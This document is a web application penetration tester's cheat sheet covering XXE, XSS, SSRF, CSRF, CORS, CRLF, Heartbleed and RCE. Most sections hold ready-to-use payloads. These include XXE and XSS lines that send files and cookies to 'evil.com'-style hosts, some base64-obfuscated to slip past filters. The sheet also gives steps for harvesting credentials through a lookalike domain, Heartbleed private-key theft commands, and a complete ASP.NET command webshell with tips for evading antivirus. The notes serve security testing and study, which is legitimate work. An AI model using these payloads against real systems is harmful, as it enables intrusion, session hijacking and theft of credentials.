Web Application Penetration Testing Notes

XXE

Once you've intercepted the POST to the vulnerable page, see if you can get the system to do what it would normally, but with entities:

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test "THIS IS A STRING!">
]>
<methodCall><methodName>&test;</methodName></methodCall>

Next, see if you can throw an error:

<?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test "nice string bro">]
>

<methodCall><methodName>&test;</methodName></methodCall>

If that worked, let's see if we can read files off of the system:

<?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test SYSTEM "file:///etc/passwd">]
>

<methodCall><methodName>&test;</methodName></methodCall>

Or open a php file on the system:

<?xml version="1.0"?>
<!DOCTYPE a
[<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">]
>

<methodCall><methodName>&test;</methodName></methodCall>

This should return a base-64 encoded string that when decoded will be the php file you've targeted.

Webgoat 8

Test to see if we can add a comment with entities:

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test "THIS IS A STRING!">
]>
<comment><text>&test;</text></comment>

Now check if you can read a file off of the filesystem:

<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<comment><text>&test;</text></comment>

Mutillidae

To grab files on mutillidae, use this payload on the vulnerable form input:

<?xml version="1.0"?> <!DOCTYPE a
[<!ENTITY TEST SYSTEM "file:///etc/passwd">]
>

<methodCall><methodName>&TEST;</methodName></methodCall>

You can also omit the xml version:

<!DOCTYPE a
[<!ENTITY TEST SYSTEM "file:///etc/passwd">]
>

<methodCall><methodName>&TEST;</methodName></methodCall>

as well as apply the getting the contents of a php file discussed above:

<!DOCTYPE a
[<!ENTITY TEST SYSTEM "php://filter/convert.base64-encode/resource=phpinfo.php">]
>
<methodCall><methodName>&TEST;</methodName></methodCall>

Out of band

HTTP

  1. Put this into the XML file you're uploading:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM
  "file:///etc/lsb-release">
  <!ENTITY % dtd SYSTEM
  "http://<evil attacker hostname>:8000/evil.dtd">
  %dtd;
]>
<data>&send;</data>
  1. Put this file on <evil attacker hostname> in evil.dtd:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<evil attacker hostname>:8000/?collect=%file;'>"> %all;
  1. Host the dtd file:
python -m SimpleHTTPServer 8000
  1. Upload the XML file.

Resource: https://dzone.com/articles/out-of-band-xml-external-entity-oob-xxe

FTP

  1. Put this into the XML file you're uploading:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://<evil attacker hostname>:8090/xxe_file.dtd">
%asd;
%c;
]>
<a>&rrr;</a>
  1. Put this file on <evil attacker hostname> in xxe_file.dtd:
<!ENTITY % d SYSTEM "file:///etc/passwd">                                     
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://<evil attacker hostname>:2121/%d;'>">
  1. Host the dtd file:
python -m SimpleHTTPServer 8090
  1. Run this ruby script on <evil attacker hostname>.

  2. Upload the XML file.

Resource: https://blog.zsec.uk/out-of-band-xxe-2/

This can also be used to save having to run two separate listeners: https://staaldraad.github.io/2016/12/11/xxeftp/

Some different payloads:
https://gist.github.com/staaldraad/01415b990939494879b4
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XXE_Fuzzing.txt

Resources

https://blog.zsec.uk/out-of-band-xxe-2/
https://pentesterlab.com/exercises/play_xxe/course
https://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection
https://find-sec-bugs.github.io/bugs.htm#XXE_SAXPARSER
https://www.youtube.com/watch?v=m6KP0wpBJpU
https://www.slideshare.net/ssuserf09cba/xxe-how-to-become-a-jedi
https://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/
https://blog.detectify.com/2018/04/17/owasp-top-10-xxe/

XSS

For ASP.NET endpoints, will only work for stored XSS - uses unicode to encode the angle brackets:

'%uff1cscript%uff1ealert('XSS');%uff1c/script%uff1e'

File upload string XSS

If you find a file upload function for an image, try introducing an image with XSS in the filename like so:

<img src=x onerror=alert('XSS')>.png

Another one:

"><img src=x onerror=alert('XSS')>.png

Generic payloads

svg/onload: http://jsfiddle.net/23sqP/3/
'-alert(1)-': Payload to stick in an event, like an onclick.
eval(atob('YWxlcnQoMSk=')): generate string with btoa('alert(1)')

This payload supposedly works only on Firefox according to the OWASP XSS filter evasion site. However, I've had luck with it in Chrome as well in the context of a stored XSS in a text editor-type application:

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

If you have open redirection, try this:

data:text/html%3bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K

A polygot I built based on this one:

oNcliCk=alert(1)%20)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>%5Cx3csVg/<img/src/onerror=alert(2)>%5Cx3e

Basic Auth Cred Harvester

If you run across a site that's vulnerable to stored XSS, but has the HTTPOnly flag set for the cookie, try harvesting their credentials with a basic auth prompt:

  1. Get a domain that looks reasonably close to that of your target.
  2. Download Phishery from here: https://github.com/ryhanson/phishery and compile the binary.
  3. Compile and run it
  4. Set this up for the payload: <img/src/onerror=document.location="https://evil.com/">
  5. Wait for creds to come in.

Steal cookies

Simple payload to steal cookies:

<img/src/onerror=document.location="http://evil.com:8090/cookiez.php?c="+document.cookie>

Blacklist bypass:
I came across a site recently that was blacklisting //, :, ", <, and >. This is what I did to get around that issue:

btoa('document.location="http://evil.com:8090/r.php?c="+document.cookie')

gives you this string:
'ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='

Use this payload:

eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9ldmlsLmNvbTo4MDkwL3IucGhwP2M9Iitkb2N1bWVudC5jb29raWU='))

Another one:

<script>new Image().src="http://evil.com:8090/b.php?"+document.cookie;</script>

This one is pretty awesome:

<svg onload=fetch("//attacker/r.php?="%2Bcookie)>

Set up listener to intercept:

nc -lvp 8090

or you can also use this:

python -m SimpleHTTPServer 8090

Test session hijacking

Use burp repeater, it makes it incredibly easy to play with different cookies, and understand the impact, especially with the render tab of the response.

Resources:
https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/
https://www.exploresecurity.com/a-tricky-case-of-xss/
https://brutelogic.com.br/blog/xss101/

Filter bypass resources

Collection of awesome resources to deal with filters:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://bittherapy.net/a-trick-to-bypass-an-xss-filter-and-execute-javascript/
https://support.portswigger.net/customer/portal/articles/2590820-bypassing-signature-based-xss-filters-modifying-script-code
https://brutelogic.com.br/blog/avoiding-xss-detection/
https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec

POST-based XSS

If you have a situation in which you can't turn your POST based XSS into a GET request (perhaps GET requests are disabled on the target server), give CSRF a try. This can provide you the opportunity to deliver your payload to a victim.

DOM-based XSS Payloads:

<target.com>/#<img/src/onerror=alert("XSS")>

If jQuery is being used and you want to get a beef hook into place (be sure to modify the URL encoded string before using):

<target.com>/#img/src/onerror=$("body").append(decodeURIComponent('%3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3a%2f%2f%3c%65%76%69%6c%20%69%70%3e%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e'))>

Steal cookie

img=new Image();img.src="http://evil.com:8090/b.php?"+document.cookie

Set up a listener on evil.com:

python -m SimpleHTTPServer 8090

Resource: https://www.lanmaster53.com/2011/05/13/stealth-cookie-stealing-new-xss-technique/

Nice site for JS event keycodes:
http://keycode.info/

These sites have a ton of great payloads:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS injection
https://zseano.com/tutorials/4.html
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html
http://www.xss-payloads.com/payloads-list.html?a#category=all

Could be useful for payload generation:
http://www.jsfuck.com/
https://github.com/aemkei/jsfuck
https://convert.town/ascii-to-text (Helpful to generate String.fromCharCode attacks)
http://jdstiles.com/java/cct.html (Also helpful to generate String.fromCharCode attacks)

Resources

https://brutelogic.com.br/blog/file-upload-xss/
https://infosecauditor.wordpress.com/2013/05/27/bypassing-asp-net-validaterequest-for-script-injection-attacks/
https://brutelogic.com.br/blog/

SSRF

If you have control over a URL parameter and it's not a redirect, you should start hunting for SSRF.

It's also worthwhile to look at Webhooks, PDF generators, document parsers, and file uploads. More information can be found here.

Set up a listener (Burp Collaborator also works great):

nc -l -n -vv -p 8080 -k

If there's a parser looking for a specific IP address, try decimal IP notation.

This has a great write-up on SOP and CORS, as well as SSRF: https://www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/

Bug Bounty Write-ups:
http://www.sxcurity.pro/2017/12/17/hackertarget/
http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
https://seanmelia.files.wordpress.com/2016/07/ssrf-to-pivot-internal-networks.pdf
https://github.com/ngalongc/bug-bounty-reference#server-side-request-forgery-ssrf

Payloads:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SSRF injection

Resources

http://resources.infosecinstitute.com/the-ssrf-vulnerability/#gref
http://blog.safebuff.com/2016/07/03/SSRF-Tips/
https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF
https://www.acunetix.com/blog/articles/server-side-request-forgery-vulnerability/
https://securingtomorrow.mcafee.com/mcafee-labs/server-side-request-forgery-takes-advantage-vulnerable-app-servers/
https://hack-ed.net/2017/11/07/a-nifty-ssrf-bug-bounty-write-up/

Recon

https://medium.com/@adrien_jeanneau/whats-tools-i-use-for-my-recon-during-bugbounty-ec25f7f12e6d

SQL Injection

Test for SQLi in PUT REST Params with SQLMap:

  1. Mark the Vulnerable parameter with *
  2. Copy the request and paste it into a file.
  3. Run it with sqlmap:
sqlmap -r <file with request> -vvvv

Use tamper scripts to tell sqlmap how to encode its injections.

JSQL is an alternative to sqlmap that is not nearly as developed, but looks interesting.

Developers seemed to respond well to this when they were unable to understand why parameterized queries worked. TL;DR - the values are separated from the query itself.

Cheatsheet: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

Resources

https://www.sxcurity.pro/asus-sqli/

Session Fixation

A quick sanity check that can be used to determine if Session Fixation is an issue on a site:

  1. Go to the login page, observe the session ID that the unauthenticated user has.

  2. Login to the site. Once in, observe the session ID that the user has. If the session ID matches the one that was given by the site before the user authenticated, you are looking at a session fixation vulnerability.

CSRF

Some bypass techniques, even if a CSRF token is in place: https://zseano.com/tutorials/5.html

CSRF POC vs. REST API which can work if the target application isn't validating the request header:

<html>
<script>
function jsonreq() {
  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST","https://target.com/api/endpoint", true);
  xmlhttp.setRequestHeader("Content-Type","text/plain");
  //xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
  xmlhttp.withCredentials = true;
  xmlhttp.send(JSON.stringify({"test":"x"}));
}
jsonreq();
</script>
</html>

https://www.gracefulsecurity.com/csrf-vs-json/

CSRF to Reflected XSS

This is a template to POC this sort of attack chain.

<html>
  <body>
    <p>Please wait... ;)</p>
    <script>
let host = 'http://target.com'
let beef_payload = '%3c%73%63%72%69%70%74%3e%20%73%3d%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%73%63%72%69%70%74%27%29%3b%20%73%2e%74%79%70%65%3d%27%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%27%3b%20%73%2e%73%72%63%3d%27%68%74%74%70%73%3a%2f%2f%65%76%69%6c%2e%63%6f%6d%2f%68%6f%6f%6b%2e%6a%73%27%3b%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%68%65%61%64%27%29%5b%30%5d%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%73%29%3b%20%3c%2f%73%63%72%69%70%74%3e'
let alert_payload = '%3Cimg%2Fsrc%2Fonerror%3Dalert(1)%3E'

function submitRequest() {
  var req = new XMLHttpRequest();
  req.open(<CSRF components, which can easily be copied from Burp's POC generator>);
  req.setRequestHeader("Accept", "*\/*");
  req.withCredentials = true;
  req.onreadystatechange = function () {
    if (req.readyState === 4) {
      executeXSS();
    }
  }
  req.send();
}

function executeXSS() {
  window.location.assign(host+'<URI with XSS>'+alert_payload);
}

submitRequest();
    </script>
  </body>
</html>
  • If a vulnerable endpoint uses PUT or DELETE, CSRF won't be possible (due to preflighting - https://w3c.github.io/webappsec-cors-for-developers/#cors), unless there is also a CORS misconfiguration. Be sure if you're testing this with burp and platform authentication that you turn off burp before you run your CSRF POC.

Resources

https://security.stackexchange.com/questions/106105/exploiting-csrf-put-request
https://stackoverflow.com/questions/11833061/is-csrf-possible-with-put-or-delete-methods
https://security.stackexchange.com/questions/166724/should-i-use-csrf-protection-on-rest-api-endpoints
https://security.stackexchange.com/questions/149085/vuln-cross-origin-resource-sharing-arbitrary-origin-trusted
https://www.moesif.com/blog/technical/cors/Authoritative-Guide-to-CORS-Cross-Origin-Resource-Sharing-for-REST-APIs/

File upload vulnerabilities

Create test 10gig file on OS X (useful for testing file upload limitations):

mkfile -n 10g temp_10GB_file

Unrestricted File Upload

Resources

http://nileshkumar83.blogspot.com/2017/01/file-upload-through-null-byte-injection.html

Other Cheatsheets

https://github.com/jhaddix/tbhm

Misconfigured CORS

POC (host on a site you own):

<!DOCTYPE html>
<html>
  <body>
    <center>
      <h2>CORS POC Exploit</h2>

      <div id="demo">
        <button type="button" onclick="cors()">Exploit</button>
      </div>

      <script>
function cors() {
  var req = new XMLHttpRequest();
  req.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = this.responseText;
    }
  };
  req.open("GET", "<site>", true);
  req.withCredentials = true;
  req.send();
}
      </script>
  </body>
</html>

Resources

https://www.securityninja.io/understanding-cross-origin-resource-sharing-cors/
http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html
https://www.youtube.com/watch?v=wgkj4ZgxI4c
http://ejj.io/misconfigured-cors/
https://www.youtube.com/watch?v=lg31RYYG-T4
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
https://w3c.github.io/webappsec-cors-for-developers/#cors

Testing for heartbleed

nmap -d --script ssl-heartbleed --script-args vulns.showall -sV -p <port> <target ip> --script-trace -oA heartbleed-%y%m%d

Steal private key:

wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
echo "<target>:<port>" > targets.txt
python heartbleed.py -f targets.txt -v -e

Read through the memory:

wget https://raw.githubusercontent.com/sensepost/heartbleed-poc/master/heartbleed-poc.py
python heartbleed-poc.py <target> -p <target port> | less

You can also run strings on the subsequent dump.bin file that is created if you prefer.

Resources

https://gist.github.com/bonsaiviking/10402038
https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py

Get Burp Suite working with Chrome on OSX

  1. Download the Burp certificate by going to http://burp and clicking CA Certificate
  2. Go to Keychain Access
  3. Click File -> Import Items
  4. Click the "I" icon in the lower left hand side of the window
  5. Click the arrow next to Trust
  6. Change When using this certificate: to Always Trust
  7. Restart Chrome

CORS Misconfiguration

http://ejj.io/misconfigured-cors/
http://gerionsecurity.com/2013/11/cors-attack-scenarios/
Using CORS misconfiguration to steal a CSRF Token:
https://yassineaboukir.com/blog/security-impact-of-a-misconfigured-cors-implementation/
Basic POC for testing (loosely based off of http://www.sxcurity.pro/2017/11/27/tricky-CORS/ and https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/):

<!DOCTYPE html>
<html>
<script>
function cors() {
  var req = new XMLHttpRequest();
  req.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = this.responseText;
      // If you want to print something out after it finishes:
      //alert(req.getAllResponseHeaders());
      //alert(localStorage.access_token);
    }
  };
  // If you need to set a header (you probably won't):
  // req.setRequestHeader("header name", "value");
  req.open("GET", "https://<vulnerable target>", true);
  req.withCredentials = true;
  req.send();
}
</script>
  <body>
    <center>
      <h2>CORS POC Exploit</h2>

      <div id="demo">
        <button type="button" onclick="cors()">Exploit</button>
      </div>

  </body>
</html>

What is the DOM?

This probably belongs at the top of this article, but I found this article recently thanks to this page, and found the explanation to be simple, concise, and to the point: https://css-tricks.com/dom/. Definitely something I wish I had found when I was getting started in this field.

Open Redirect

Open redirect to XSS: http://breenmachine.blogspot.com/2013/01/abusing-open-redirects-to-bypass-xss.html

Open redirect to XSS BEeF payload:

<script> s=document.createElement('script'); s.type='text/javascript'; s.src='http://evil.com:3000/hook.js'; document.getElementsByTagName('head')[0].appendChild(s); </script>

Use the Decoder in Burp to encode this to base-64, and deliver it for the payload:

data:text/html;base64,PHNjcmlwdD4gcz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsgcy50eXBlPSd0ZXh0L2phdmFzY3JpcHQnOyBzLnNyYz0naHR0cDovL2V2aWwuY29tOjMwMDAvaG9vay5qcyc7IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdoZWFkJylbMF0uYXBwZW5kQ2hpbGQocyk7IDwvc2NyaXB0Pg==

This site has a ton of payload ideas: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open redirect

Resources

http://blog.beefproject.com/2013/03/subverting-cloud-based-infrastructure.html

CRLF Injection

If you see your input parameter for a request:

http://inj.example.org/redirect.asp?origin=foo

echo'd back in the response headers:

HTTP/1.1 302 Object moved
Date: Mon, 07 Mar 2016 17:42:46 GMT
Location: account.asp?origin=foo
Connection: close
Content-Length: 121

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>

You should try CRLF injection:

http://inj.example.org/redirect.asp?origin=foo%0d%0aSet-Cookie:%20ASPSESSIONIDACCBBTCD=SessionFixed%0d%0a

CRLF: %0d%0a

Resources

https://www.gracefulsecurity.com/http-header-injection/
https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
https://www.acunetix.com/websitesecurity/crlf-injection/
https://blog.innerht.ml/twitter-crlf-injection/

Template Injection

Angular

Some code you can throw into jsfiddle for payload testing:

<html>
<head> 
<meta charset="utf-8">
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.js"></script>
</head>
<body>
<div ng-app>
{{constructor.constructor('alert(1)')()}}
</div>
</body>
</html>

Resources

http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html

RCE

Bypass AV with webshell uploads:

Take a known webshell, and modify strings such as function names and the title (if applicable).

Here's an example with one of the webshells found in the fuzzdb project:

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string executeIt(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdClick(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(executeIt(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>REALLY NICE</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="execute" OnClick="cmdClick"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>

References

https://hax365.wordpress.com/2015/12/15/easy-trick-to-upload-a-web-shell-and-bypass-av-products/

PHP Experimentation

If you need to test some php code, you can use the native web server to host it up:

php -S 127.0.0.1:80 -t .

Obviously you should be careful with this...

CSV Injection

Great write-up here explaining what it is and why you want to be concerned: http://georgemauer.net/2017/10/07/csv-injection.html
A video showing an example of this as well:
https://www.youtube.com/watch?v=SC7AkclnG2g

Useful scripts

Continously check if a site is up or down

while true; do /usr/bin/wget "http://[target]/uri/path" --timeout 30 -O - 2>/dev/null | grep "[item on page]" || echo "The site is down"; sleep 10; done

IDORs

https://www.bugcrowd.com/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/

Clickjacking

Just use Burp's clickbandit. Also remember: Clickjacking is for clicks, not for keyboard.

https://javascript.info/clickjacking
https://www.tinfoilsecurity.com/blog/what-is-clickjacking

Attacking JSON

Evidently at this point in time (5/2018), Burp's scanner is not doing as well with testing json parameters for SQLi and RCE. Be sure to set custom injection points by sending a potentially vulnerable request to intruder, marking the parameters, right clicking, and clicking Actively scan defined insertion points from the dropdown.

Resource:
https://www.coalfire.com/Solutions/Coalfire-Labs/The-Coalfire-LABS-Blog/may-2018/the-right-way-to-test-json-parameters-with-burp

Existing Cheatsheets and Resources

This details all of the steps from recon to exploitation. Definitely worth checking out:
https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/
Another great one:
https://danielmiessler.com/projects/webappsec_testing_resources/
Some awesome bug hunting findings:
https://www.youtube.com/watch?v=mQjTgDuLsp4